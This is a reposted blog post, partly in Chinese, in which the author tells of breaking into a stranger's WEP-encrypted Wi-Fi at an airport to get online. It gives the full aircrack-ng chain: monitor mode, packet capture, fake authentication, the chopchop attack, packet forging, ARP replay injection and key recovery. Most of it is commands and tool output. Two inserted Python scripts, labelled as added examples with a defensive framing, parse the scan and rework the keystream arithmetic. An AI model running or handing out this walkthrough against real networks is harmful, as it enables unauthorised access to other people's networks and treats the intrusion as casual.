When reposting articles from this site please give credit; reposted from: 扶凱 [http://www.php-oa.com]
Link to this article: http://www.php-oa.com/2009/04/16/ubuntu-airmon-ng.html
A few days ago I was picking up my girlfriend at the airport. I had two hours to wait and was pretty bored sitting there, so I wanted to get online with my laptop, but I found that basically all the networks were encrypted and none were usable. With no other option, I had to go in the hard way. The whole process took 20 minutes in total.
My environment is Ubuntu 9.04. The laptop is an IBM X200 and the wireless card is an Intel(R) WiFi Link 5100 AGN. Doing this under Linux is really convenient. Below is the whole wireless cracking process.
Put the wlan interface into monitor mode
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon
Interface Chipset Driver
mon0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0)
Start capturing packets (do not close this terminal)
fukai@fukai-laptop:~$ sudo airodump-ng -w chop.cap --ivs --channel 11 mon0
CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:02:2D:B4:31:01 -55 0 10 0 0 1 11 OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11 OPN C
00:02:2D:B4:30:F6 -72 96 10393 206 0 11 11 OPN C
00:0F:B5:79:DD:DD -76 93 8306 24444 0 11 54 . WEP WEP OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11 OPN C
00:02:2D:B4:5D:78 -74 0 5 0 0 1 11 OPN C
00:02:2D:B4:31:5A -76 0 6 0 0 1 11 OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP PSK S
00:02:2D:B4:5D:64 -80 0 8 0 0 1 11 OPN C
BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:DD:DD 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
^C
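The scan table above is the starting point of any wireless audit: per BSSID it shows ENC/CIPHER/AUTH and the station table shows which clients are associated with which AP. The script below is an added example, not code from this post or from the aircrack-ng suite; it parses those airodump-ng rows (the sample input is the rows shown above, with the ESSIDs truncated to one letter as they are on the page) and flags access points still running open or WEP, listing the clients seen on each. The ENC field is located by keyword rather than by column index because the MB column may be printed as "54 ." and shifts the positions of the fields after it. The function and class names (parse_airodump, weak_networks, AccessPoint) are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Sample input: the airodump-ng rows shown above (ESSIDs are truncated to one letter,
# exactly as they appear on the page).
SCAN_OUTPUT = """\
CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:02:2D:B4:31:01 -55 0 10 0 0 1 11 OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11 OPN C
00:0F:B5:79:DD:DD -76 93 8306 24444 0 11 54 . WEP WEP OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11 OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP PSK S
BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:DD:DD 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
"""

MAC_RE = re.compile(r"^[0-9A-F]{2}(?::[0-9A-F]{2}){5}$", re.IGNORECASE)
ENC_KEYWORDS = {"OPN", "WEP", "WPA", "WPA2", "WPA3"}

# (ENC, CIPHER) combinations a wireless audit should flag.
WEAK_CONFIGS = {
    ("OPN", None): "open network: frames are sent in the clear",
    ("WEP", "WEP"): "WEP: single static RC4 key, recoverable from captured traffic",
    ("WPA", "TKIP"): "WPA/TKIP: deprecated cipher, migrate to WPA2-CCMP or WPA3",
    ("WPA2", "TKIP"): "WPA2 with TKIP: deprecated cipher, disable TKIP",
}


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    data_frames: int
    enc: str
    cipher: Optional[str]
    auth: Optional[str]
    essid: str
    stations: List[str] = field(default_factory=list)


def parse_airodump(text: str) -> Dict[str, AccessPoint]:
    """Parse the AP table and the station table of an airodump-ng screen."""
    aps: Dict[str, AccessPoint] = {}
    in_station_table = False
    for line in text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == "BSSID":            # header row: switches between the two tables
            in_station_table = tokens[1] == "STATION"
            continue
        if in_station_table:
            # station rows: BSSID STATION ...; "(not associated)" rows carry no BSSID
            if len(tokens) > 1 and MAC_RE.match(tokens[0]) and MAC_RE.match(tokens[1]):
                if tokens[0] in aps:
                    aps[tokens[0]].stations.append(tokens[1])
            continue
        if not MAC_RE.match(tokens[0]):     # status line such as "CH 11 ][ BAT: ..."
            continue
        # The MB column may print as "54 ." so ENC has no fixed index: find it by keyword.
        enc_idx = next((i for i in range(7, len(tokens)) if tokens[i] in ENC_KEYWORDS), None)
        if enc_idx is None:
            continue
        enc = tokens[enc_idx]
        if enc == "OPN":
            cipher = auth = None
            essid = " ".join(tokens[enc_idx + 1:])
        else:
            cipher, auth = tokens[enc_idx + 1], tokens[enc_idx + 2]
            essid = " ".join(tokens[enc_idx + 3:])
        aps[tokens[0]] = AccessPoint(
            bssid=tokens[0], channel=int(tokens[6]), data_frames=int(tokens[4]),
            enc=enc, cipher=cipher, auth=auth, essid=essid,
        )
    return aps


def weak_networks(aps: Dict[str, AccessPoint]) -> List[Tuple[str, str, str, List[str]]]:
    """Return (bssid, enc, reason, associated stations) for every AP with a flagged configuration."""
    findings = []
    for ap in aps.values():
        reason = WEAK_CONFIGS.get((ap.enc, ap.cipher))
        if reason:
            findings.append((ap.bssid, ap.enc, reason, list(ap.stations)))
    return findings


if __name__ == "__main__":
    table = parse_airodump(SCAN_OUTPUT)
    for bssid, enc, reason, stations in weak_networks(table):
        ap = table[bssid]
        print(f"{bssid} ch{ap.channel:<2} {enc:<5} {ap.data_frames:>6} data frames  {reason}")
        for sta in stations:
            print(f"    client {sta}")
```

Run against the rows above it flags the three open networks and the WEP network, and attaches the client 00:21:5D:90:E9:0A to the WEP BSSID; the WPA2/CCMP network is left alone. Feeding it a longer live capture works the same way, since the parser keys only on the header rows and the MAC format.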
進(jìn)行FakeAuth攻擊(我原來的x60到這步就死機(jī))
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:DD:DD -h 00:21:5d:90:e9:0a mon0
注:-h為主機(jī)MAC地址 -a為需要破解的無線AP的地址
21:59:31 Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
21:59:31 Sending Authentication Request (Open System) [ACK]
21:59:31 Authentication successful
21:59:31 Sending Association Request [ACK]
21:59:31 Association successful

進(jìn)行Chopchop攻擊
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:DD:DD -h 00:21:5d:90:e9:0a mon0
22:00:05 Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
Read 2507 packets…
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:0F:B5:79:DD:DD
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:79:DD:DD
0x0000: 0842 0000 ffff ffff ffff 000f b579 0498 .B………..y..
0x0010: 000f b579 0498 005a 6772 0400 6e0c 067f …y…Zgr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab |…..1.&…^P..
0x0030: 3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83 :..V….ob}..N..
0x0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc ..^.p?…….!..
0x0050: 8767 f385 61cc .g..a.
Use this packet ? y
Saving chosen packet in replay_src-0413-220115.cap
Offset 85 ( 0% done) | xor = F9 | pt = 35 | 92 frames written in 1569ms
Offset 84 ( 1% done) | xor = 82 | pt = E3 | 33 frames written in 561ms
Offset 83 ( 3% done) | xor = 63 | pt = E6 | 141 frames written in 2404ms
Offset 82 ( 5% done) | xor = 77 | pt = 84 | 198 frames written in 3373ms
Offset 81 ( 7% done) | xor = 67 | pt = 00 | 69 frames written in 1166ms
Offset 80 ( 9% done) | xor = 87 | pt = 00 | 3 frames written in 50ms
Offset 79 (11% done) | xor = BC | pt = 00 | 461 frames written in 7840ms
Offset 78 (13% done) | xor = A2 | pt = 00 | 452 frames written in 7665ms
Offset 77 (15% done) | xor = 21 | pt = 00 | 156 frames written in 2660ms
Offset 76 (17% done) | xor = 8D | pt = 00 | 256 frames written in 4360ms
Offset 75 (19% done) | xor = 8C | pt = 00 | 31 frames written in 519ms
Offset 74 (21% done) | xor = BD | pt = 00 | 12 frames written in 211ms
Offset 73 (23% done) | xor = 8D | pt = 00 | 681 frames written in 11572ms
Offset 72 (25% done) | xor = 82 | pt = 00 | 231 frames written in 3936ms
Offset 71 (26% done) | xor = 14 | pt = 00 | 126 frames written in 2148ms
Offset 70 (28% done) | xor = F4 | pt = 00 | 359 frames written in 6085ms
Offset 69 (30% done) | xor = 3F | pt = 00 | 143 frames written in 2443ms
Offset 68 (32% done) | xor = 70 | pt = 00 | 253 frames written in 4307ms
Offset 67 (34% done) | xor = 17 | pt = 00 | 70 frames written in 1182ms
Offset 66 (36% done) | xor = 5E | pt = 00 | 100 frames written in 1691ms
Offset 65 (38% done) | xor = A4 | pt = 00 | 164 frames written in 2779ms
Offset 64 (40% done) | xor = FC | pt = 00 | 1101 frames written in 18689ms
Offset 63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in 17906ms
Offset 62 (44% done) | xor = 9D | pt = 00 | 226 frames written in 3819ms
Offset 61 (46% done) | xor = E6 | pt = A8 | 181 frames written in 3076ms
Offset 60 (48% done) | xor = 09 | pt = C0 | 16 frames written in 271ms
Offset 59 (50% done) | xor = 0B | pt = 00 | 55 frames written in 939ms
Offset 58 (51% done) | xor = 7D | pt = 00 | 71 frames written in 1197ms
Offset 57 (53% done) | xor = 62 | pt = 00 | 228 frames written in 3860ms
Offset 56 (55% done) | xor = 6F | pt = 00 | 331 frames written in 5626ms
Offset 55 (57% done) | xor = F0 | pt = 00 | 198 frames written in 3354ms
Offset 54 (59% done) | xor = 14 | pt = 00 | 64 frames written in 1089ms
Offset 53 (61% done) | xor = A3 | pt = 01 | 246 frames written in 4174ms
Offset 52 (63% done) | xor = FC | pt = 00 | 754 frames written in 12819ms
Offset 51 (65% done) | xor = FE | pt = A8 | 102 frames written in 1721ms
Offset 50 (67% done) | xor = DB | pt = C0 | 42 frames written in 721ms
Offset 49 (69% done) | xor = 87 | pt = 98 | 97 frames written in 1645ms
Offset 48 (71% done) | xor = 3E | pt = 04 | 47 frames written in 797ms
Offset 47 (73% done) | xor = D2 | pt = 79 | 63 frames written in 1064ms
Offset 46 (75% done) | xor = 51 | pt = B5 | 252 frames written in 4252ms
Offset 45 (76% done) | xor = 5F | pt = 0F | 108 frames written in 1828ms
Offset 44 (78% done) | xor = 5E | pt = 00 | 241 frames written in 4074ms
Offset 43 (80% done) | xor = F2 | pt = 01 | 193 frames written in 3257ms
Offset 42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in 19048ms
Offset 41 (84% done) | xor = 18 | pt = 04 | 420 frames written in 7191ms
Offset 40 (86% done) | xor = 20 | pt = 06 | 586 frames written in 9941ms
Offset 39 (88% done) | xor = F1 | pt = 00 | 394 frames written in 6683ms
Offset 38 (90% done) | xor = 39 | pt = 08 | 228 frames written in 3868ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in 17194ms
Offset 36 (94% done) | xor = FF | pt = 00 | 282 frames written in 4801ms
Offset 35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in 31105ms
Sent 2386 packets, current guess: 48…
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor
Completed in 303s (0.16 bytes/s)
Use tcpdump to view the contents of the generated CAP file
fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0F:B5:79:DD:DD SA:00:0F:B5:79:DD:DD LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa) Command, ctrl 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.0.101 tell 192.168.0.1
Build the injection packet
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h 00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap
At the same time, run the interactive attack
fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0F:B5:79:DD:DD -h 00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:0F:B5:79:DD:DD
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:5D:90:E9:0A
0x0000: 0841 0201 000f b579 0498 0021 5d90 e90a .A…..y…!]…
0x0010: ffff ffff ffff 8001 6772 0400 6e0c 067f ……..gr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 |…..1.&…^~.B
0x0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 ..$..\..ob}…b.
0x0040: e060 df45 .`.E
Use this packet ? y
Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.
End of file.
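The chopchop output above lists, for each offset, the recovered keystream byte (xor) and the resulting plaintext byte (pt), and the .xor keystream file is then reused by packetforge-ng to encrypt a new ARP request under the same IV. The following script is an added example, not part of the original post or of the aircrack-ng suite; it reproduces that arithmetic from the page's own data so the tool output can be checked by hand. It XORs the body of the captured frame (taken from the aireplay-ng -4 hex dump; the MAC in that dump is used as printed even though it differs from the BSSID in the command lines) with the keystream from the xor column, filling offsets 28-34 from the fixed LLC/SNAP prefix the same way the tool's "ARP header re-creation" workaround does, decodes the ARP request that tcpdump displayed, recomputes the CRC-32 ICV over the recovered data, and then applies the identical keystream to the forged frame shown by aireplay-ng -2. Both frames carry IV 67:72:04, which is why one recovered keystream decrypts both; WPA2/CCMP avoids this by using a per-packet nonce and a keyed MIC instead of WEP's static key and linear CRC. The function names (full_keystream, decrypt_arp) and the layout constants are this example's own assumptions.

```python
import struct
import zlib
from typing import Dict

# Frame chosen by "aireplay-ng -4" above, copied from its hex dump (86 bytes, MAC as in the dump).
CHOPPED_FRAME = bytes.fromhex(
    "0842 0000 ffff ffff ffff 000f b579 0498"
    "000f b579 0498 005a 6772 0400 6e0c 067f"
    "7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab"
    "3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83"
    "fca4 5e17 703f f414 828d bd8c 8d21 a2bc"
    "8767 f385 61cc"
)
# Frame built by packetforge-ng and shown by "aireplay-ng -2" above (68 bytes).
FORGED_FRAME = bytes.fromhex(
    "0841 0201 000f b579 0498 0021 5d90 e90a"
    "ffff ffff ffff 8001 6772 0400 6e0c 067f"
    "7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42"
    "d78d 2401 035c 14f0 6f62 7d0b f619 6219"
    "e060 df45"
)
# The "xor =" column of the chopchop run, reordered to ascending offset 35..85
# (the tool recovers the frame from its end, so it prints offset 85 first).
RECOVERED_KEYSTREAM = bytes.fromhex(
    "f8 ff 13 39 f1 20 18 03 f2 5e 5f 51 d2 3e 87 db fe fc a3 14 f0 6f 62 7d 0b"
    "09 e6 9d e6 fc a4 5e 17 70 3f f4 14 82 8d bd 8c 8d 21 a2 bc 87 67 77 63 82 f9"
)
FIRST_RECOVERED_OFFSET = 35

HDR_LEN = 24                      # 802.11 data header: FC, duration, addr1-3, sequence
IV_LEN = 4                        # 24-bit WEP IV followed by the key-id byte
BODY_OFFSET = HDR_LEN + IV_LEN    # offset 28: first encrypted byte
ICV_LEN = 4                       # CRC-32 integrity check value, encrypted together with the data
LLC_SNAP_ARP = bytes.fromhex("aa aa 03 00 00 00 08 06")   # fixed prefix of every 802.11 ARP frame


def full_keystream(frame: bytes) -> bytes:
    """Keystream for offsets 28..85 of any frame encrypted under this IV.

    Offsets 28-34 were not chopped (the AP drops frames shorter than 35 bytes, hence the
    tool's "ARP header re-creation" message); they are derived from the known LLC/SNAP
    prefix. Offsets 35-85 come straight from the chopchop output."""
    known_prefix = frame[BODY_OFFSET:FIRST_RECOVERED_OFFSET]
    derived = bytes(c ^ p for c, p in zip(known_prefix, LLC_SNAP_ARP))
    return derived + RECOVERED_KEYSTREAM


def decrypt_arp(frame: bytes, keystream: bytes) -> Dict[str, object]:
    """XOR the encrypted body with the keystream and decode the ARP request inside."""
    body = frame[BODY_OFFSET:]
    if len(body) > len(keystream):
        raise ValueError("frame body longer than the recovered keystream")
    plain = bytes(c ^ k for c, k in zip(body, keystream))
    data, icv = plain[:-ICV_LEN], plain[-ICV_LEN:]
    if data[:len(LLC_SNAP_ARP)] != LLC_SNAP_ARP:
        raise ValueError("decrypted body does not start with an LLC/SNAP ARP header")
    # ARP: hw type, proto type, hw len, proto len, opcode, sender MAC/IP, target MAC/IP
    _, ptype, _, _, opcode, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", data[8:36])

    def mac(b: bytes) -> str:
        return ":".join(f"{x:02x}" for x in b)

    def ip(b: bytes) -> str:
        return ".".join(str(x) for x in b)

    return {
        "iv": frame[HDR_LEN:HDR_LEN + 3].hex(),
        "ethertype": int.from_bytes(data[6:8], "big"),
        "proto_type": ptype,
        "opcode": opcode,
        "sender_mac": mac(sha), "sender_ip": ip(spa),
        "target_mac": mac(tha), "target_ip": ip(tpa),
        # WEP ICV = CRC-32 over the plaintext data, stored little-endian
        "icv_ok": zlib.crc32(data) == int.from_bytes(icv, "little"),
        "summary": (f"arp who-has {ip(tpa)} tell {ip(spa)}" if opcode == 1
                    else f"arp reply {ip(spa)} is-at {mac(sha)}"),
    }


if __name__ == "__main__":
    ks = full_keystream(CHOPPED_FRAME)
    for name, frame in (("captured", CHOPPED_FRAME), ("forged", FORGED_FRAME)):
        info = decrypt_arp(frame, ks)
        print(f"{name}: IV {info['iv']} -> {info['summary']} (ICV ok: {info['icv_ok']})")
```

The captured frame decodes to "arp who-has 192.168.0.101 tell 192.168.0.1", matching the tcpdump line, and the forged frame decodes with the same 58-byte keystream to an ARP request from 00:21:5d:90:e9:0a with the 255.255.255.255 addresses given to packetforge-ng by -k and -l. That a keystream recovered from one frame decrypts (and, via the linear CRC, validly re-encrypts) a different frame is the property a defender should take away: it holds for every WEP network regardless of key length, and disappears only by moving such networks to WPA2-CCMP or WPA3.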
Crack the key
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs
Aircrack-ng 1.0 rc3
[00:00:02] Tested 296 keys (got 15985 IVs)
KB depth byte(vote)
0 5/ 6 01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
1 3/ 5 0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
2 0/ 2 45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
3 0/ 1 67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
4 4/ 5 89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)
KEY FOUND! [ 01:23:45:67:89 ]
Decrypted correctly: 100%